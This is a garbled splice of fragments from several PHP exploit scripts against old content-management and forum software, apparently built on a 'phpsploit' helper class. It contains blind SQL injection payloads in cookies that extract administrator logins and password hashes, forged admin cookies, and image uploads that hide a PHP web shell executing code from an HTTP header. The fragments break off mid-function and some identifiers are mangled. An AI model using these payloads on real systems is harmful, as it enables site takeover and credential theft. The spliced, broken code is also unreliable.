}
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");
$source = @file_get_contents($file);
if (strlen($source) < 2) {
    exit("{$file} don't exist.\n");
}
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
    $xpl->addcookie("PHPSESSID", $phpsessid[1]);
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
}
print "[*] Id : {$id}\n";
//Upload
$formdata = array(frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil', 'action' => 'modifier', 'ok' => '1', 'id' => $id, 'pseudo' => $login, 'sql_newNom' => $login, 'sql_newMail' => $email, 'MAX_FILE_SIZE' => '2097152', 'valider' => ' Modifier mon profil', 'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source));
        $xpl->get($url . str_replace("./", "/", $matches[1]));
        preg_match_all("#(.*)='(.*)';#", $xpl->getcontent(), $vars);
        for ($z = 0; $z <= 4; $z++) {
            print "\nsploit> " . strtolower($vars[1][$z]) . " -> " . $vars[2][$z];
        }
    }
}
print "\nstatus> Trying to get the administrator login/passwd";
$headers = array("Username", "Password");
$fields = array("login", "passwd");
$value = $length = array();
for ($a = 0; $a < 2; $a++) {
    print "\nsploit> " . $headers[$a] . " length ";
    for ($b = 1; $b < 3; $b++) {
        for ($c = 48; $c <= 57; $c++) {
            $xpl->addcookie("fid", "-1%20OR%20SUBSTR(LENGTH((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201)),{$b},1)=CHAR({$c})");
            if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
                $length[$a] .= chr($c);
                print chr($c);
                break;
            }
        }
    }
    print "\nsploit> " . $headers[$a] . " -> ";
    for ($d = 1; $d <= $length[$a]; $d++) {
        for ($e = 0; $e <= 128; $e++) {
            $xpl->addcookie("fid", "-1%20OR%20HEX(SUBSTR((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201),{$d},1))=HEX(CHAR({$e}))");
            if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
                $value[$a] .= chr($e);
                print chr($e);
                break;
# 71.    list($AIpass, $Xsuper_admintest)=mysql_fetch_row($result);
# 72.    if (md5($AIpass) == $AIpwd and $AIpass != "") {
# 73.       $admintest = true;
# 74.       $super_admintest = $Xsuper_admintest;
# 75.    } else {
# 76.       Admin_Alert("Password in Cookies not Good #1 : $aid / $AIpwd | ");
# 77.    }
# 78.  }
# 79.  unset ($AIpass);
# 80.  unset ($AIpwd);
# 81.  unset ($Xadmin);
# 82.  unset ($Xsuper_admintest);
# 83. }
#
$c*k = urlencode(base64_encode($aid[1] . ':' . md5($pwd[1])));
$xpl->addcookie('admin', $c*k);
print "\nAdmin_cookie: admin={$c*k}\n\$shell> ";
# +admin/settings.php (CODE EXECUTION)
# |
# 758. switch($op) {
# 763. case "ConfigSave":
# 764. include("admin/settings_save.php");
# 765. ConfigSave($xparse,$xsitename,$xnuke_url,$xsite_logo,$xslogan,$xstartdate,$xadminmail,
#      $xtop,$xstoryhome,$xoldnum,$xultramode,$xanonpost,$xDefault_Theme,$xbanners,$xmyIP,
#      $xfoot1,$xfoot2,$xfoot3,$xfoot4,$xbackend_title,$xbackend_language,$xbackend_image,
#      $xbackend_width,$xbackend_height,$xlanguage,$xlocale,$xperpage,$xpopular,$xnewlinks,
#      $xtoplinks,$xlinksresults,$xlinks_anonaddlinklock,$xnotify,$xnotify_email,$xnotify_subject,
#      $xnotify_message,$xnotify_from,$xmoderate,$xcommentlimit,$xanonymous,$xmaxOptions,$xBarScale,
#      $xsetCookies,$xtipath,$xuserimg,$xadminimg,$xadmingraphic,$xsite_font,$xadmart,$xminpass,
#      $xhttpref,$xhttprefmax,$xpollcomm,$xlinkmainlogo,$xstart_page,$xsmilies,$xOnCatNewLink,
#      $xEmailFooter,$xshort_user,$xgzhandler,$xrss_host_verif,$xcache_verif,$xmember_list,
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url . 'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file)));
#                     `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
#                     '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
#                     '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
#                     '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP", "255.255.255.255");
$xpl->get($url . 'index.php');
# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
    $xpl->get($url . "includes/nsbypass.php?tid={$c}");
    if (!preg_match("#phpnuke.org#", $xpl->getheader())) {
        $tid = $c;
        print "\nValid tid found: {$tid}\nHash: {$login} -> ";
        break;
    }
    if ($c == $nbtst) {
        exit("\n#1 Exploit failed");
    }
}
# MD5 hash length [32]
#
for ($a = 1; $a <= 32; $a++) {
    # MD5 charset [a-f0-9]
print "    by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
if ($argc < 3) {
    print "usage: php phptn_exploit.php -url <url> [options]\n\n";
    print " Options: -mode    0 -> Remote Upload (default)\n";
    print "                   1 -> Remote Code Execution\n";
    print "          -proxy   If you want to use a proxy.\n";
    exit;
}
$url = getparam("url", 1);
$mode = getparam("mode") ? getparam("mode") : 0;
$prx = getparam("proxy");
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar */
if ($mode == 0) {
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
        print "      SID -> {$admin_sid}\n";
        print "      UID -> {$admin_uid}\n";
        finalattack($admin_sid, $admin_uid);
    } else {
        exit("[*] Can't log in\n");
    }
} else {
    /* User account defined */
    if ($acc) {
        print "[*] Using user account {$acc}\n";
        list($login, $passwd) = explode(":", $acc);
        $xpl->addheader("Referer", $url);
        $c = $xpl->post($url . "index.php?file=User&nuked_nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
        if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
            # User Cookies
            $xpl->addcookie("{$prefix}sess_id", $sid[1]);
            $xpl->addcookie("{$prefix}user_id", $uid[1]);
        } else {
            exit("[*] Can't log in\n");
        }
    }
    $queries = array();
    $queries[] = array("     SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
    $queries[] = array("     UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("   Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $xpl->agent("Mozilla Firefox");
    $xpl->addheader("X-Forwarded-For", "127.0.0.1");
    $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
    if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
        exit("[*] You don't have rights to access Stats page.\n");
    $xpl->get($url);
    $xpl->reset('header');
}
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
    die("Exploit Failed");
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
    print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
    exit("\nNo session found");
}
# Logged in as admin
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]);
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
} else {
    print "\n\$shell> ";
}
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/